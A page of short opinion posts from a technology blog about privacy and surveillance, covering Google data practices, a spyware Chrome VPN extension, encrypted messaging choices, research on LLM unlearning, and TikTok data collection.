Google Data Slurps: Never, Ever

December 11, 2025

Here’s another lie from Googleland via Techspot, “Google Denies Gmail Reads Your Emails And Attachments To Train AI, But Here’s How To Opt-Out Anyway.”  Google claims that it doesn’t use emails and attachments to train AI, but we know that’s false.  Google correctly claims that it uses user-generation data for personalization of their applications, like Gmail.  We all know that’s a workaround to use that data for other purposes.

The article includes instructions on how to opt out of information being used to train AI and “personalize” experiences.  Gmail users, however, have had bad experiences with that option, including the need to turn the feature off multiple times. 

Google claims it is committed to privacy but:

“Google has flatly denied using user content to train Gemini, noting that Gmail has offered some of these features for many years. However, the Workspace menu refers to newly added Gemini functionality several times.

The company also denied automatically modifying user permissions, but some people have reported needing multiple attempts to turn off smart features.”

There’s also security vulnerabilities:

“In addition to raising privacy concerns, Gmail’s AI functionality has exposed serious vulnerabilities. In March, Mozilla found that attackers could easily inject prompts that would cause the client’s AI generated summaries to become phishing messages.”

Imagine that one little digital switch protects your privacy and data.  Methinks it is a placebo effect. Whitney Grace, December 11, 2025

A Interesting Free Software: FreeVPN

August 28, 2025

Dino 5 18 25No AI. Just a dinobaby working the old-fashioned way.

I often hear about the wonders of open source software. Even an esteemed technologist like Pavel Durov offers free and open source software. He wants to make certain aspects of Telegram transparent. “Transparent” is a popular word in some circles. China releases Qwen and it is free. The commercial variants are particularly stimulating. Download free and open source software. If you run into a problem, just fix it yourself. Alternatively you can pay for “commercial for fee” support. Choice! That’s the right stuff.

I read “Chrome VPN Extension with 100K Installs Screenshots All Sites Users Visit.” Note: By the time you read this, the Googlers may have blocked this extension or the people who rolled out this digital Trojan horse may have modified the extension’s behavior to something slightly less egregious.

Now back to the Trojan horse with a saddle blanket displaying the word “spyware.” I quote:

FreeVPN.One, a Chrome extension with over 100,000 installs and a verified badge on the Chrome Web Store, is exposed by researchers for taking screenshots of users’ screens and exfiltrating them to remote servers. A Koi Security investigation of the VPN tool reveals that it has been capturing full-page screenshots from users’ browsers, logging sensitive visual data like personal messages, financial dashboards, and private photos, and uploading it to aitd[.]one, a domain registered by the extension’s developer.

The explanation makes clear that one downloads and installs or activates a Chrome extension. Then the software sends data to the actor deploying the malware.

The developer says:

The extension’s developer claimed to Koi Security that the background screenshot functionality is part of a “security scan” intended to detect threats.

Whom does one believe? The threat detection outfit or the developer.

Can you recall a similar service? Hint: Capitalize the “r” in “Recall.”

Can the same stealth (clumsy stealth in some cases) exist in other free software? Does a jet air craft stay aloft when its engines fail?

Stephen E Arnold, August 28, 2025

Leave No Data Unslurped: A New Google T Shirt Slogan?

August 25, 2025

Dino 5 18 25No AI. Just a dinobaby working the old-fashioned way.

That mobile phone is the A Number One surveillance device ever developed. Not surprisingly, companies have figured out how to monetize the data flowing through the device. Try explaining the machinations of those “Accept Defaults” to a clutch of 70-something bridge players. Then try explaining the same thing to the GenAI type of humanoid. One group looks at you with a baffled work on their faces. The other group stares into the distance and says, “Whatever.”

Now the Google wants more data, fresh information, easily updated. Because why not? “Google Expands AI-Based Age Verification System for Search Platform.” The write up says:

Google has begun implementing an artificial intelligence-based age verification system not only on YouTube but also on Google Search … Users in the US are reporting pop-ups on Google Search saying, “We’ve changed some of your settings because we couldn’t verify that you’re of legal age.” This is a sign of new rules in Google’s Terms of Service.

Why the scope creep from YouTube to “search” with its AI wonderfulness? The write up says:

The new restrictions could be another step in re-examining the balance between usability and privacy.

Wrong. The need for more data to stuff into the assorted AI “learning” services provide a reasonable rationale. Tossing in the “prevent harm” angle is just cover.

My view of the matter is:

  1. Mobile is a real time service. Capturing more information of a highly-specific nature is something that is an obvious benefit to the Google.
  2. Users have zero awareness of how the data interactions work and most don’t want to know to try to understand cross correlation.
  3. Google’s goals are not particularized. This type of “fingerprint” just makes sense.

The motto could be “Leave no data unslurped.” What’s this mean? Every Google service will require verification. The more one verifies, the fresher the identify information and the items that tag along and can be extracted. I think of this as similar to the process of rendering slaughtered livestock. The animal is dead, so what’s the harm.

None, of course. Google is busy explaining how little its data centers use to provide those helpful AI overview things.

Stephen E Arnold, August x, 2025

Stephen E Arnold, August 25, 2025

DuckDuck Privacy. Go, Go, Go

August 8, 2025

We all know Google tracks us across the Web. But we can avoid that if we use a privacy-touting alternative, right? Not necessarily. Simple Analytics reveals, “Google Is Tracking You (Even When You Use DuckDuckGo).” Note that Simple Analytics is a Google Analytics competitor. So let us keep that in mind as we consider its blog’s assertions. Still, writer Iron Brands cites a study by Safety Detectives as he writes:

“The study analyzed browsing patterns in the US, UK, Switzerland, and Sweden. They used a virtual machine and VPN to simulate users in these countries. By comparing searches on Google and DuckDuckGo, researchers found Google still managed to collect data (often without the user knowing). Here’s how: Google doesn’t just track people through Search or Gmail. Its invisible code runs on millions of sites through Google Analytics, AdSense ads, YouTube embeds, and other background services like Fonts or Maps. That means even if you’re using DuckDuckGo, you’re not totally out of Google’s reach. In Switzerland and Sweden, using DuckDuckGo cut Google tracking by half. But in the US, more than 40% of visited pages still sent data back to Google, despite using a privacy search engine. That’s largely because many US websites rely on Google’s tools for ads and traffic analysis.”

And here we thought Google made such tools affordable out of generosity. The post continues:

“This isn’t just about search engines. It’s about how deeply Google is embedded into the internet’s infrastructure. Privacy-conscious users often assume that switching to DuckDuckGo or Brave is enough. This research says otherwise. … You need more than just a private browser or search engine to reduce tracking. Google’s reach comes from third-party scripts that websites willingly add.”

To owners of those websites, Brands implores them to stop contributing to the problem. The write-up emphasizes that laws like the EU’s GDPR do not stem the tide. Such countries, we are told, are still awash in Google’s trackers. The solution? For both websites and users to divest themselves of Google as much as possible. As it happens, Brand’s firm offers site owners just such a solution—an analytics platform that is “privacy-first and cookie-free.” Note that Beyond Search has not independently verified these claims. Concerned site owners may also want to check out alternative Google alternatives.

Cynthia Murrell, August 8, 2025

Apple and Google Texting Bad. So What Are the Options?

December 17, 2024

animated-dinosaur-image-0049_thumb_thumb_thumb_thumb_thumb_thumb_thumbThis blog post flowed from the sluggish and infertile mind of a real live dinobaby. If there is art, smart software of some type was probably involved.

This headline caught my attention: “FBI Warns iPhone and Android Users to Stop Texting Each Other for a Disturbing Reason.” What is that disturbing reason? According to the online article cited:

Both the FBI and US Cybersecurity and Infrastructure Security Agency are warning users to use a messaging app instead and one that uses end-to-end encryption. The warning comes amid a major cyberattack that has been called ‘unprecedented’ by the press. The attack has impacted telecommunications companies such as AT&T and Verizon. By using encrypted messaging apps, texters can keep their messages hidden from hackers. The hacking campaign has been nicknamed Salt Typhoon by Microsoft and it has not been fully solved. NBC News called it ‘one of the largest intelligence compromises in US history’.

Interesting. I recall that AT&T was not particularly chatty when information about a security compromise floated around. T-Mobile has experienced a few security issues as well. And Verizon? Same boat.

image

It is interesting that a sinking boat is an image several art generators refuse to produce. Anyway, Midjourney — after a lot of semantic wrangling spit out this good enough image.

After reading the article, I decided to navigate to X.com and ask Grok what the options were for a person who has muscle memory for texting folks from an Apple or Android mobile device? To use Grok, navigate to the tweeter, log in, and look for the Grok word on the displayed page. I went through these hoops slowly because when I queried Google about “how to use Grok”, the Google told me I had to sign up for a premium membership. That was wrong. No wonder Google is a service I find a bit short of the target.

Here are the services Grok (Mr. Musk’s smart software designed to compete in the Big Boy AI dodgeball contest). I quote the tweet thing’s smart output:

  • “Signal: Known for its strong privacy features, Signal offers end-to-end encryption for texts, voice calls, and video calls. It’s open-source, which adds to its credibility for privacy-conscious users. Signal is available on both Android and iOS, making it a great cross-platform option.
  • WhatsApp: With over 2 billion users, WhatsApp is a popular choice for cross-platform messaging. It supports text, voice, and video calls with end-to-end encryption. However, it’s worth noting that WhatsApp is owned by Meta (formerly known as Facebook), which might be a concern for privacy.
  • Telegram: Offers a wide range of features like large group chats, channels, bots, and self-destructing messages. While it provides end-to-end encryption in its “Secret Chat” mode, not all chats are encrypted by default, which could be a privacy concern for some users. Telegram is available on both Android and iOS.
  • Facebook Messenger: Another Meta-owned service, it’s widely used due to its integration with the social network. It supports free calls, video chats, and even has features like payment options in some regions. However, its privacy policies are often scrutinized.
  • Google Chat: Part of Google Workspace, this app provides a platform for both personal and work-related communications with features like spaces for team collaboration. It’s integrated well with other Google services, although its adoption outside of Google’s ecosystem is less widespread.
  • Viber: Offers free calls and messages, including stickers, GIFs, and public chats. Its user base is significant in certain regions but less so globally compared to WhatsApp or Telegram. Viber also has end-to-end encryption for calls and messages.
  • Spike: Described as an email-based messaging app, Spike combines email and chat functionality, making it suitable for both personal and professional use. It’s noted for its cross-platform capabilities and privacy focus.
  • SimpleX Chat: An open-source, privacy-focused chat app that doesn’t require phone numbers for registration, focusing on decentralization and user privacy.
  • Element (formerly Riot.im): Based on the Matrix protocol, it’s an open-source, decentralized platform that supports secure, encrypted communication. It’s good for those looking for privacy with the flexibility of self-hosting.
  • Beeper: An all-in-one messaging app that aims to unify various messaging services into one platform, although it has limitations like no official iMessage support due to Apple’s policies.”

Each of these apps is allegedly an E2EE or end-to-end encrypted messaging service. These are not presented in alphabetical order. I assume that Grok is providing the names in a rank ordering based on some criteria not explained to me. But that’s the future of smart software. Just do something and say, “Good enough.”

I noted several things about this list:

  1. There are no Chinese messaging apps. Is this censorship from an outfit seemingly concerned about free speech. I was surprised at the omission of QQ and WeChat with appropriate surveillance notices from Grok.
  2. One approach is for messaging clients to rely on Extensible Messaging and Presence Protocol. Conversations for Android and ChatSecure for iOS were at one time options.
  3. Inclusion of Telegram is definitely interesting because Pavel Durov has reversed course and now cooperates with law enforcement. Telegram has even played nice with anti-CSAM organizations. The about face coincided with his detainment by French authorities.
  4. The Grok listing does not include new and possible interesting services like PrivateLine.io., which illustrates the shallow nature of the knowledge exposed to these smart systems. (Even Yandex.com lists this service in its search results.)
  5. Alphabetizing lists is just not part of the 2024 world it seems.

There are some broader questions about encrypted messaging which are not addressed in the cited write up or the Grok “smart” output; for example:

  1. Are other messaging apps encrypted end to end or are there “special” operations which make the content visible and loggable once the user sends the message?
  2. Is the encryption method used by these apps “unbreakable”?
  3. Are the encryption methods home grown or based on easily inspected open source methods?
  4. What entities have access to either the logged data about a message or access to the message payload?

The alarm has been sounded about the failure of some US telecommunications companies to protect their own systems and by extension the security of their customers. But numerous questions remain with partial or no answers. Answers are, from my point of view, thin.

Stephen E Arnold, December 17, 2024

Does Smart Software Forget?

November 21, 2024

A recent paper challenges the big dogs of AI, asking, “Does Your LLM Truly Unlearn? An Embarrassingly Simple Approach to Recover Unlearned Knowledge.” The study was performed by a team of researchers from Penn State, Harvard, and Amazon and published on research platform arXiv. True or false, it is a nifty poke in the eye for the likes of OpenAI, Google, Meta, and Microsoft, who may have overlooked  the obvious. The abstract explains:

“Large language models (LLMs) have shown remarkable proficiency in generating text, benefiting from extensive training on vast textual corpora. However, LLMs may also acquire unwanted behaviors from the diverse and sensitive nature of their training data, which can include copyrighted and private content. Machine unlearning has been introduced as a viable solution to remove the influence of such problematic content without the need for costly and time-consuming retraining. This process aims to erase specific knowledge from LLMs while preserving as much model utility as possible.”

But AI firms may be fooling themselves about this method. We learn:

“Despite the effectiveness of current unlearning methods, little attention has been given to whether existing unlearning methods for LLMs truly achieve forgetting or merely hide the knowledge, which current unlearning benchmarks fail to detect. This paper reveals that applying quantization to models that have undergone unlearning can restore the ‘forgotten’ information.”

Oops. The team found as much as 83% of data thought forgotten was still there, lurking in the shadows. The paper offers a explanation for the problem and suggestions to mitigate it. The abstract concludes:

“Altogether, our study underscores a major failure in existing unlearning methods for LLMs, strongly advocating for more comprehensive and robust strategies to ensure authentic unlearning without compromising model utility.”

See the paper for all the technical details. Will the big tech firms take the researchers’ advice and improve their products? Or will they continue letting their investors and marketing departments lead them by the nose?

Cynthia Murrell, November 21, 2024

Lark Flies Home with TikTok User Data, DOJ Alleges

August 7, 2024

An Arnold’s Law of Online Content states simply: If something is online, it will be noticed, captured, analyzed, and used to achieve a goal. That is why we are unsurprised to learn, as TechSpot reports, “US Claims TikTok Collected Data on Users, then Sent it to China.” Writer Skye Jacobs reveals:

“In a filing with a federal appeals court, the Department of Justice alleges that TikTok has been collecting sensitive information about user views on socially divisive topics. The DOJ speculated that the Chinese government could use this data to sow disruption in the US and cast suspicion on its democratic processes. TikTok has made several overtures to the US to create trust in its privacy and data controls, but it has also been reported that the service at one time tracked users who watched LGBTQ content. The US Justice Department alleges that TikTok collected sensitive data on US users regarding contentious issues such as abortion, religion and gun control, raising concerns about privacy and potential manipulation by the Chinese government. This information was reportedly gathered through an internal communication tool called Lark.”

Lark is also owned by TikTok parent company ByteDance and is integrated into the app. Alongside its role as a messaging platform, Lark has apparently been collecting a lot of very personal user data and sending it home to Chinese servers. The write-up specifies some of the DOJ’s concerns:

“They warn that the Chinese government could potentially instruct ByteDance to manipulate TikTok’s algorithm to use this data to promote certain narratives or suppress others, in order to influence public opinion on social issues and undermine trust in the US’ democratic processes. Manipulating the algorithm could also be used to amplify content that aligns with Chinese state narratives, or downplay content that contradicts those narratives, thereby shaping the national conversation in a way that serves Chinese interests.”

Perhaps most concerning, the brief warns, China could direct ByteDance to use the data to “undermine trust in US democracy and exacerbate social divisions.” Yes, that tracks. Meanwhile, TikTok insists any steps our government takes against it infringe on US users’ First Amendment rights. Oh, the irony.

In the face of US government’s demand it sell off TikTok or face a ban, ByteDance has offered a couple of measures designed to alleviate concerns. So far, though, the Biden administration is standing firm.

Cynthia Murrell, August 7, 2024

Perfect for Spying, Right?

June 28, 2024

And we thought noise-cancelling headphones were nifty. The University of Washington’s UW News announces “AI Headphones Let Wearer Listen to a Single Person in a Crowd, by Looking at them Just Once.” That will be a real help for the hard-of-hearing. Also spies. Writers Stefan Milne and Kiyomi Taguchi explain:

“A University of Washington team has developed an artificial intelligence system that lets a user wearing headphones look at a person speaking for three to five seconds to ‘enroll’ them. The system, called ‘Target Speech Hearing,’ then cancels all other sounds in the environment and plays just the enrolled speaker’s voice in real time even as the listener moves around in noisy places and no longer faces the speaker. … To use the system, a person wearing off-the-shelf headphones fitted with microphones taps a button while directing their head at someone talking. The sound waves from that speaker’s voice then should reach the microphones on both sides of the headset simultaneously; there’s a 16-degree margin of error. The headphones send that signal to an on-board embedded computer, where the team’s machine learning software learns the desired speaker’s vocal patterns. The system latches onto that speaker’s voice and continues to play it back to the listener, even as the pair moves around. The system’s ability to focus on the enrolled voice improves as the speaker keeps talking, giving the system more training data.”

If the sound quality is still not satisfactory, the user can refresh enrollment to improve clarity. Though the system is not commercially available, the code used for the prototype is available for others to tinker with. It is built on last year’s “semantic hearing” research by the same team. Target Speech Hearing still has some limitations. It does not work if multiple loud voices are coming from the target’s direction, and it can only eavesdrop on, er, listen to one speaker at a time. The researchers are now working on bringing their system to earbuds and hearing aids.

Cynthia Murrell, June 28, 2024

Our Privacy Is Worth $47 It Seems

June 6, 2024

dinosaur30a_thumb_thumbThis essay is the work of a dinobaby. Unlike some folks, no smart software improved my native ineptness.

Multimillion dollar lawsuits made on behalf of the consumer keep businesses in check. These lawsuits fight greedy companies that want to squeeze every last cent from consumers and take advantage of their ignorance. Thankfully many of these lawsuits are settled in favor of the consumers, like the Federal Trade Commission (FTC) vs. Ring. Unfortunately, the victims aren’t getting much in the form of compensation says OM in: “You Are Worth $47.”

Ring is a camera security company that allowed its contractors and employees to access users’ private data. The FTC and Ring reached a settlement in the case, resulting in $5.6 million to be given to 117,000 victims. That will be $47 per person. That amount will at least pay for a tank of gas or a meal for two in some parts of the country. It’s better than what other victims received:

“That is what your data (and perhaps your privacy) is worth — at least today. It is worth more than what T-Mobile or Experian paid as a fine per customer: $4.50 and $9, respectively. This minuscule fine is one of the reasons why companies get away with playing loose and easy with our privacy and data.”

OM is exactly right that the small compensation amounts only stirs consumers’ apathy more. What’s the point of fighting these mega conglomerates when the pay out is so small? Individuals, unless they’re backed with a boatload of money and strong sense of stubborn, righteous justice, won’t fight big businesses.

It’s the responsibility of law makers to fight these companies, but they don’t. They don’t fight for consumers because they’re either in the pocket of big businesses or they’re struck down before they even begin.

My listing is inactive and says I need approval to sell this item. I have approval to sell it.

Whitney Grace, June 6, 2024

Bugged? Hey, No One Can Get Our Data

December 22, 2023

green-dino_thumb_thumb_thumbThis essay is the work of a dumb dinobaby. No smart software required.

I read “The Obscure Google Deal That Defines America’s Broken Privacy Protections.” In the cartoon below, two young people are confident that their lunch will be undisturbed. No “bugs” will chow down on their hummus, sprout sandwiches, or their information. What happens, however, is that the young picnic fans cannot perceive what is out of sight. Are these “bugs” listening? Yep. They are. 24×7.

image

What the young fail to perceive is that “bugs” are everywhere. These digital creatures are listening, watching, harvesting, and consuming every scrap of information. The image of the picnic evokes an experience unfolding in real time. Thanks, MSFT Copilot. My notion of “bugs” is obviously different from yours. Good enough and I am tired of finding words you can convert to useful images.

The essay explains:

While Meta, Google, and a handful of other companies subject to consent decrees are bound by at least some rules, the majority of tech companies remain unfettered by any substantial federal rules to protect the data of all their users, including some serving more than a billion people globally, such as TikTok and Apple.

The situation is simple: Major centers of techno gravity remain unregulated. Law makers, regulators, and “users” either did not understand or just believed what lobbyists told them. The senior executives of certain big firms smiled, said “Senator, thank you for that question,” and continued to build out their “bug” network. Do governments want to lose their pride of place with these firms? Nope. Why? Just reference bad actors who commit heinous acts and invoke “protect our children.” When these refrains from the techno feudal playbook sound, calls to take meaningful action become little more than a faint background hum.

But the article continues:

…there is diminishing transparency about how Google’s consent decree operates.

I think I understand. Google-type companies pretend to protect “privacy.” Who really knows? Just ask a Google professional. The answer in my experience is, “Hey, dude, I have zero idea.”

How does Wired, the voice of the techno age, conclude its write up? Here you go:

The FTC agrees that a federal privacy law is long overdue, even as it tries to make consent decrees more powerful. Samuel Levine, director of the FTC’s Bureau of Consumer Protection, says that successive privacy settlements over the years have become more limiting and more specific to account for the growing, near-constant surveillance of Americans by the technology around them. And the FTC is making every effort to enforce the settlements to the letter…

I love the “every effort.” The reality is that the handling of online data collection presages the trajectory for smart software. We live with bugs. Now those bugs can “think”, adapt, and guide. And what’s the direction in which we are now being herded? Grim, isn’t it?

Stephen E Arnold, December 23, 2023

Next Page »

  • Archives

  • Recent Posts

  • Meta